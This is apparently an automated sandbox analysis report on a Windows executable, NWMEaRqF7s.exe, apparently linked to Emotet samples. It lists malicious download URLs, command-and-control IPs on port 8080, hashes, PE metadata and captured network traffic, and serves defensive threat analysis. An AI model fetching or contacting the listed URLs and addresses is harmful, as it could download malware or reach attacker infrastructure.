203.117.253.142	http://ehitusest.eu/marketplacel/sites/r5zmfubb2b/	Get hash	malicious	Browse
94.200.114.161	test-emotet.exe	Get hash	malicious	Browse	94.200.114.161/
201.173.217.124	9cf2c56e_by_Libranalysis.exe	Get hash	malicious	Browse
139.99.158.11	boI88C399w.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	v8iFmF7XPp.dll	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
85.214.28.226	http://dollarino.ir/wp-admin/WNGC8YW/odadpm87/	Get hash	malicious	Browse	85.214.28.226:8080/c6MBUSvGn5v/b9RkalT/
	http://dollarino.ir/wp-admin/WNGC8YW/odadpm87/	Get hash	malicious	Browse	85.214.28.226:8080/iX0nNviyJGJwPIp0Cwl/EIVLJNSXGoMQfG57z/eomXAhYIoBqAhduPWx2/Yy1B2pgFwRMMsqGxgEI/WAVhliYP/LyiGPs4/
	http://dollarino.ir/wp-admin/WNGC8YW/odadpm87/	Get hash	malicious	Browse	85.214.28.226:8080/yEku1Atw0KYZUt2mPh/Ff5phRAu/a5vyBclnLMgCU/POBiFSNCDy/282vIGlcuH9WKu3U8W/
	1117353589729455561.doc	Get hash	malicious	Browse	85.214.28.226:8080/ngcTPUIerz8e/
	REP_V7E8RCN.doc	Get hash	malicious	Browse	85.214.28.226:8080/kUPeNiK/BypiHgaH8CR/PSKtNJD3/Wf6OB5frseui/h1wBC8/c30QZ/
	INV_9YJS3OF8.doc	Get hash	malicious	Browse	85.214.28.226:8080/lg1EaMz7kjz/TfgLZZ4xhvic/n6mMArGdK1/J2VDJEgCzC/PusYTu/cY199wrtW/
	K_PO_09032020EX.doc	Get hash	malicious	Browse	85.214.28.226:8080/76auc2w/ZVkItY9zYGqbj3/8EjUL/rxKZ0MmJxSre6US14x/jJFHVFPOUtK/GcoZn6VB/
	REP_11740839.doc	Get hash	malicious	Browse	85.214.28.226:8080/hKg6oxy8W/dj7frDjV2DCknYl/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROGERS-COMMUNICATIONSCA	Q8qbmLCf1b	Get hash	malicious	Browse	99.223.157.93
	Jj40Y9ur0R.exe	Get hash	malicious	Browse	24.137.215.157
	ICOJRAmjpR.exe	Get hash	malicious	Browse	72.142.102.133
	Jj40Y9ur0R.exe	Get hash	malicious	Browse	24.137.215.157
	lj2OpAHSro.exe	Get hash	malicious	Browse	72.142.102.168
	ICOJRAmjpR.exe	Get hash	malicious	Browse	72.142.102.133
	uIsv6VTOek.exe	Get hash	malicious	Browse	69.17.170.58
	ppc_unpacked	Get hash	malicious	Browse	173.34.36.197
	ldr.sh	Get hash	malicious	Browse	155.194.207.255
	z3hir.bin	Get hash	malicious	Browse	99.240.88.111
	v8iFmF7XPp.dll	Get hash	malicious	Browse	174.118.202.24
	IMG001.exe	Get hash	malicious	Browse	99.236.23.224
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse	174.118.202.24
	oHqMFmPndx.exe	Get hash	malicious	Browse	99.253.156.252
	sample2.dll	Get hash	malicious	Browse	99.240.226.2
	bdOPjE89ck.dll	Get hash	malicious	Browse	174.113.205.41
	RB1NsQ9LQf.exe	Get hash	malicious	Browse	99.237.169.251
	Da9Ph8u58q.exe	Get hash	malicious	Browse	174.113.69.136
	IwYu6X7Hv0.exe	Get hash	malicious	Browse	99.252.27.6
	https://1349fk.com/admin/55rEgXThCrasXK9fnSP	Get hash	malicious	Browse	174.113.69.136
STARHUB-MOBILEStarHubLtdSG	KnAY2OIPI3	Get hash	malicious	Browse	171.149.135.6
	IMG001.exe	Get hash	malicious	Browse	171.177.72.44
	wEcncyxrEe	Get hash	malicious	Browse	171.131.9.153
	bin.sh	Get hash	malicious	Browse	171.131.146.1
	http://ehitusest.eu/marketplacel/sites/r5zmfubb2b/	Get hash	malicious	Browse	203.117.253.142
	pYEQks7NrR.dll	Get hash	malicious	Browse	171.156.124.184
DU-AS1AE	boI88C399w.exe	Get hash	malicious	Browse	94.200.114.161
	boI88C399w.exe	Get hash	malicious	Browse	94.200.114.161
	sample1.doc	Get hash	malicious	Browse	91.75.75.46
	9cf2c56e_by_Libranalysis.exe	Get hash	malicious	Browse	5.32.55.214
	z3hir.x86	Get hash	malicious	Browse	94.205.163.7
	2ojdmC51As.exe	Get hash	malicious	Browse	94.200.114.161
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	91.75.75.46
	bdOPjE89ck.dll	Get hash	malicious	Browse	87.201.236.156
	Eacu0dRnuP.exe	Get hash	malicious	Browse	80.227.52.78
	0FUYcQzDx9.exe	Get hash	malicious	Browse	80.227.52.78
	R2OP44Ab4O.exe	Get hash	malicious	Browse	80.227.52.78
	Hu9oMnAOw0.exe	Get hash	malicious	Browse	80.227.52.78
	K2Id7qKtPQ.exe	Get hash	malicious	Browse	80.227.52.78
	YdbTF5VGwm.exe	Get hash	malicious	Browse	80.227.52.78
	82fpeVb1xS.exe	Get hash	malicious	Browse	80.227.52.78
	zMl5MZ5PFp.exe	Get hash	malicious	Browse	80.227.52.78
	McQ5aoHpaL.exe	Get hash	malicious	Browse	80.227.52.78
	4zLM7vRCKo.exe	Get hash	malicious	Browse	80.227.52.78
	H7CSqu6kSZ.exe	Get hash	malicious	Browse	80.227.52.78
	VVsJ4KRixl.exe	Get hash	malicious	Browse	80.227.52.78

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5985616952512959
Encrypted:	false
SSDEEP:	6:bxlEk1GaD0JOCEfMuaaD0JOCEfMKQmDutAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bxNGaD0JcaaD0JwQQutAg/0bjSQJ
MD5:	03AF445AADC662577CC5C2FF5CB493B7
SHA1:	CAF3BB094A48999E762B45DBA7C7707FCFAF3807
SHA-256:	E7E9CD897E3ACBF12EFC2A28D6861335BE1BB627D4E6995E1DA052958AF5F739
SHA-512:	38650210C840D940C8519D250F53A6506FF1B726B6639D8B6D015D25F947EC06E1FDB2BCFC23AA3144A392DF4B1920A2E213B09382B0220E1A0DC78484D6F3A2
Malicious:	false
Reputation:	low
Preview:	....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xcd0abd4e, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09629373506277797
Encrypted:	false
SSDEEP:	6:gzwl/+Bi1lsXRIE11Y8TRX+/AXtlirJl8K+zwl/+Bi1lsXRIE11Y8TRX+/AXtli/:g0+BnXO4bl+PJqK+0+BnXO4bl+PJqK
MD5:	E551646E6DF0D1EC8091815E27A33267
SHA1:	1E0C77F449BA3CBABC2751156287545757027E59
SHA-256:	A3FE928C06256DB6B779431F44A8D4AC7B113872D3018E66F1361FDE682B58D9
SHA-512:	CA381E956BA55E86DA30EEABF560C0E4C13222361DEFF56B0003FE36308A295D9A209DC6255EC102EE453E8AF00C94CF5042DBD09AE83E4FD630841624956815
Malicious:	false
Reputation:	low
Preview:	...N... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...............................................................................................................................................................................................................................................y.q................tB.......y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.10992535548958927
Encrypted:	false
SSDEEP:	3:om7Evt9wc8l/bJdAtiirrllAll:omirwc8t4ZrJlA
MD5:	00E4E405495A0871AECE74A720C001CC
SHA1:	1789C9324E434A77BE70F71E81E84DBFA4A24FAC
SHA-256:	B82D2782DA52FE370AA83125766C0976A27792F3ECE36C24C3C2CF4FA6C54CF3
SHA-512:	CA747EEFC99503060083DB6D38EE97E91C4E646D465FDCFC844FF725F3D25BFA8FD135F5AC74EDE16212B7B96FB7BABD18ADA6FB3006BB846D4A1B9684A70091
Malicious:	false
Reputation:	low
Preview:	R.u......................................3...w.......y.......w...............w.......w....:O.....w..................tB.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	high, very likely benign file
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.559911513630365
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NWMEaRqF7s.exe
File size:	352256
MD5:	0ba53dbed762655999bd37a1d8bee9db
SHA1:	4566e7559e5c4287a25796ed622324a6b5b70e63
SHA256:	77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79
SHA512:	4849e922fe8e2dbc1ee2feaf4fca47242ff3a75735cb2040475314e2a233876d6435075c18786f00983467dac9c4022220a98d1e05b2adf7333faa245457fd11
SSDEEP:	6144:rr/JAPRthhyJrZ/489mw42uDLnduy88ij484V4JFN:ehorZQ88LLnduy5L4LN
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..V.q...q...q...~...q...~...q...q...s..6....q..6....q..6....q..6....q..6....q..6....q..Rich.q..........................PE..L..

File Icon


Icon Hash:	1872c45ed6d4d400

Static PE Info

General
Entrypoint:	0x41f6c5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F527454 [Fri Sep 4 17:07:32 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	756fdea446bc618b4804509775306c0d

Entrypoint Preview

Instruction
call 00007FD338F46EE5h
jmp 00007FD338F3F01Bh
push 00000000h
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
call 00007FD338F46F5Dh
add esp, 14h
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00443590h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00443590h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00443590h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x41760	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3fb5c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x49000	0x101e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x34000	0x54c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3fad4	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x32dc9	0x33000	False	0.582754097733	data	6.63975517719	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x34000	0xd7b0	0xe000	False	0.320853097098	data	4.82193271055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x42000	0x651c	0x3000	False	0.263346354167	data	3.89182813108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x49000	0x101e8	0x11000	False	0.712158203125	data	7.01664902177	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x49c10	0x134	data	English	United States
RT_CURSOR	0x49d44	0xb4	data	English	United States
RT_CURSOR	0x49df8	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x49f2c	0x134	data	English	United States
RT_CURSOR	0x4a060	0x134	data	English	United States
RT_CURSOR	0x4a194	0x134	data	English	United States
RT_CURSOR	0x4a2c8	0x134	data	English	United States
RT_CURSOR	0x4a3fc	0x134	data	English	United States
RT_CURSOR	0x4a530	0x134	data	English	United States
RT_CURSOR	0x4a664	0x134	data	English	United States
RT_CURSOR	0x4a798	0x134	data	English	United States
RT_CURSOR	0x4a8cc	0x134	data	English	United States
RT_CURSOR	0x4aa00	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x4ab34	0x134	data	English	United States
RT_CURSOR	0x4ac68	0x134	data	English	United States
RT_CURSOR	0x4ad9c	0x134	data	English	United States
RT_BITMAP	0x4aed0	0xb58	data	English	United States
RT_BITMAP	0x4ba28	0xb8	data	English	United States
RT_BITMAP	0x4bae0	0x144	data	English	United States
RT_ICON	0x4bc24	0x2e8	data	English	United States
RT_ICON	0x4bf0c	0x8a8	data	English	United States
RT_ICON	0x4c7b4	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x4c8dc	0x11c	data	English	United States
RT_DIALOG	0x4c9f8	0x3be	data	English	United States
RT_DIALOG	0x4cdb8	0xe8	data	English	United States
RT_DIALOG	0x4cea0	0x34	data	English	United States
RT_STRING	0x4ced4	0x5c	data	English	United States
RT_STRING	0x4cf30	0x82	data	English	United States
RT_STRING	0x4cfb4	0x2a	data	English	United States
RT_STRING	0x4cfe0	0x192	data	English	United States
RT_STRING	0x4d174	0x4e2	data	English	United States
RT_STRING	0x4d658	0x31a	data	English	United States
RT_STRING	0x4d974	0x2dc	data	English	United States
RT_STRING	0x4dc50	0x8a	data	English	United States
RT_STRING	0x4dcdc	0xac	data	English	United States
RT_STRING	0x4dd88	0xde	data	English	United States
RT_STRING	0x4de68	0x4c4	data	English	United States
RT_STRING	0x4e32c	0x264	data	English	United States
RT_STRING	0x4e590	0x2c	data	English	United States
RT_STRING	0x4e5bc	0x42	data	English	United States
RT_GROUP_CURSOR	0x4e600	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x4e624	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e638	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e64c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e660	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e674	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e688	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e69c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e6b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e6c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e6d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e6ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e700	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e714	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x4e728	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0x4e73c	0x30	data	English	United States
RT_VERSION	0x4e76c	0x2f0	SysEx File - IDP	English	United States
RT_MANIFEST	0x4ea5c	0x56	ASCII text, with CRLF line terminators	English	United States
None	0x4eab4	0xa733	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetFileTime, GetTickCount, HeapFree, RtlUnwind, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, HeapAlloc, HeapReAlloc, GetCommandLineA, GetProcessHeap, GetStartupInfoA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, VirtualFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringA, GetFileAttributesA, GetStdHandle, Sleep, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, FileTimeToLocalFileTime, SetErrorMode, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetThreadLocale, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, GetModuleFileNameW, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, WritePrivateProfileStringA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, SetLastError, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MulDiv, LoadResource, LockResource, SizeofResource, FindResourceA, LoadLibraryW, GetProcAddress, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, CompareStringW, MultiByteToWideChar, GetVersion, LCMapStringW, InterlockedExchange
USER32.dll	UnregisterClassA, RegisterClipboardFormatA, PostThreadMessageA, ReleaseCapture, SetCapture, LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassLongA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, MessageBeep, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, EqualRect, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, CharUpperA, EnableWindow, LoadIconA, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, GetNextDlgGroupItem, InvalidateRgn, InvalidateRect, SetRect, IsRectEmpty, SetCursor, SetWindowsHookExA, CopyAcceleratorTableA, CharNextA, GetForegroundWindow, SendMessageA, AppendMenuA, GetSystemMenu, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, EnableMenuItem, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, GetClassNameA
GDI32.dll	ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, SetWindowExtEx, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetWindowExtEx
comdlg32.dll	GetFileTitleA
WINSPOOL.DRV	DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	RegOpenKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegCloseKey, RegOpenKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueExA
COMCTL32.dll
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll
ole32.dll	OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CoRevokeClassObject, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromProgID
OLEAUT32.dll	SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString

Exports

Name	Ordinal	Address
UUACZDADWAJJJJJ	1	0x401b20

Version Infos

Description	Data
LegalCopyright	Free to redistribute!
InternalName	cmdcmxcfg.exe
FileVersion	1.0.0.1
CompanyName	Shaun Harrington
ProductName	CMDCMX
ProductVersion	1.0.0.1
FileDescription	CMDCMX Configuration Application
OriginalFilename	cmdcmxcfg.exe
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
07/07/21-14:28:38.396607	ICMP	399	ICMP Destination Unreachable Host Unreachable	108.167.138.154	192.168.2.6
07/07/21-14:28:38.396630	ICMP	399	ICMP Destination Unreachable Host Unreachable	108.167.138.154	192.168.2.6
07/07/21-14:28:47.404931	ICMP	399	ICMP Destination Unreachable Host Unreachable	108.167.138.154	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 7, 2021 14:28:02.046308994 CEST	49715	80	192.168.2.6	192.158.216.73
Jul 7, 2021 14:28:05.054189920 CEST	49715	80	192.168.2.6	192.158.216.73
Jul 7, 2021 14:28:11.054743052 CEST	49715	80	192.168.2.6	192.158.216.73
Jul 7, 2021 14:28:27.430051088 CEST	49730	8080	192.168.2.6	85.214.28.226
Jul 7, 2021 14:28:27.479178905 CEST	8080	49730	85.214.28.226	192.168.2.6
Jul 7, 2021 14:28:28.024962902 CEST	49730	8080	192.168.2.6	85.214.28.226
Jul 7, 2021 14:28:28.075285912 CEST	8080	49730	85.214.28.226	192.168.2.6
Jul 7, 2021 14:28:28.587384939 CEST	49730	8080	192.168.2.6	85.214.28.226
Jul 7, 2021 14:28:28.636841059 CEST	8080	49730	85.214.28.226	192.168.2.6
Jul 7, 2021 14:28:32.111177921 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.244106054 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.244673967 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.245615959 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.245640993 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.381731033 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.383198977 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.383311987 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.383486032 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.383539915 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:32.383594036 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.385051012 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.385063887 CEST	49731	443	192.168.2.6	142.44.137.67
Jul 7, 2021 14:28:32.518074036 CEST	443	49731	142.44.137.67	192.168.2.6
Jul 7, 2021 14:28:35.237533092 CEST	49732	8080	192.168.2.6	162.241.242.173
Jul 7, 2021 14:28:38.229489088 CEST	49732	8080	192.168.2.6	162.241.242.173
Jul 7, 2021 14:28:44.245021105 CEST	49732	8080	192.168.2.6	162.241.242.173
Jul 7, 2021 14:28:59.309189081 CEST	49753	80	192.168.2.6	85.152.162.105
Jul 7, 2021 14:29:02.309590101 CEST	49753	80	192.168.2.6	85.152.162.105
Jul 7, 2021 14:29:08.310369968 CEST	49753	80	192.168.2.6	85.152.162.105
Jul 7, 2021 14:29:23.890443087 CEST	49757	443	192.168.2.6	62.30.7.67
Jul 7, 2021 14:29:26.896228075 CEST	49757	443	192.168.2.6	62.30.7.67
Jul 7, 2021 14:29:32.909693003 CEST	49757	443	192.168.2.6	62.30.7.67
Jul 7, 2021 14:29:47.683315039 CEST	49760	8080	192.168.2.6	78.24.219.147
Jul 7, 2021 14:29:50.676578999 CEST	49760	8080	192.168.2.6	78.24.219.147
Jul 7, 2021 14:29:56.677504063 CEST	49760	8080	192.168.2.6	78.24.219.147

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
